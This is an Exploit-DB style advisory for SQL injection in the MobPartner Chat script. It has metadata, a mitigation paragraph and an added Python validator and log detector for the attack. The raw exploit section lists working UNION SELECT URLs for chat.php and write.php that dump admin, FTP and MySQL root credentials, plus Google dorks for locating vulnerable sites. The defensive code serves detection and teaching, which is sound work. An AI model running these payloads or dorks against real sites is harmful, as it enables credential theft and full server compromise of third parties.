Vendor: Chat
Author: AtT4CKxT3rR0r1ST
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Chat
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

MobPartner Chat Multiple Sql Injection Vulnerability

MobPartner Chat is vulnerable to multiple SQL Injection vulnerabilities. Attackers can exploit these vulnerabilities to gain access to the admin panel, FTP control panel, and root server. Attackers can use the 'null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--' payload to gain access to the admin panel, 'null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--' payload to gain access to the FTP control panel, and 'null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--' payload to gain access to the root server.

Mitigation:

Developers should validate user input (here the `id` parameter of chat.php and write.php) and pass it to SQL only through parameterized queries, never by concatenating it into the query string.
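As an added illustration (not code from the advisory or from MobPartner), the Python below applies the whitelist check a fixed chat.php/write.php should make on `id` and, run over constructed Apache-style access-log lines, flags requests to those two endpoints whose `id` carries the UNION-based extraction described above. The log lines, the positive-integer assumption for `id`, and the signature regexes are assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2009:10:01:02 +0000] "GET /chat.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2009:10:01:09 +0000] "GET /chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users-- HTTP/1.1" 200 6234 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2009:10:01:15 +0000] "GET /write.php?id=null%20and%201=2%20union%20select%201,concat(host,0x3a,user,0x3a,password),3,4,5,6%20from%20mysql.user-- HTTP/1.1" 200 6101 "-" "curl/7.19"
203.0.113.10 - - [12/May/2009:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

VULNERABLE_PATHS = {"/chat.php", "/write.php"}   # endpoints named in the advisory
PARAM = "id"
# Assumption: a legitimate id is a plain positive integer. This is the
# whitelist check a fixed chat.php/write.php should apply before any query.
ID_RE = re.compile(r"^[1-9]\d*$")
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+(?:all\s+)?select", re.I)
TABLE_RE = re.compile(r"from\s+(texad_admin\.users|pureftpd\.ftpd|mysql\.user)\b", re.I)


def is_safe_id(value: str) -> bool:
    """Whitelist validation: accept only a plain positive integer."""
    return ID_RE.fullmatch(value) is not None


def analyze_request(line: str):
    """Return a finding for one log line, or None when the request looks benign."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in VULNERABLE_PATHS:
        return None
    # parse_qs decodes %xx escapes and '+' alike, so both encodings of the
    # payload seen in the advisory normalise to the same SQL text.
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if is_safe_id(raw):
            continue
        return {"ip": m.group("ip"), "path": parts.path, "id": raw,
                "union": UNION_RE.search(raw) is not None,
                "tables": [t.lower() for t in TABLE_RE.findall(raw)]}
    return None


def analyze_log(text: str) -> list:
    """Apply analyze_request to every line and keep the findings."""
    return [f for f in map(analyze_request, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["ip"], finding["path"], finding["tables"])
```

Only requests whose `id` fails the whitelist are inspected further, so a benign numeric `id` never reaches the signature regexes.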

Exploit-DB raw data:

MobPartner Chat Multiple Sql Injection Vulnerability
============================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : MobPartner
.:. Download Script: http://www.mobpartner.com/services/chat/?wsid=32174
.:. Bug Type       : Sql Injection [Mysql]
.:. Dork           : [1]"Powered by MobPartner" inurl:"chat.php"
                       [2]"Powered by MobPartner" inurl:"write.php"
####################################################################

===[ Exploit ]===

www.site.com/chat.php?id=[SQL INJECTION]
www.site.com/write.php?id=[SQL INJECTION]

********************************************************************
 T0 Get Username & Password Admin Site

[Sql Injection ; {Username & password Admin}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--


********************************************************************
 T0 Get Username & Password FTP Control Panel

[Sql Injection ; {Username & Password FTP Control Panel}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--


********************************************************************
 T0 Get Username & Password Root Server

[Sql Injection ; {Username & Password Root Server}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--

####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack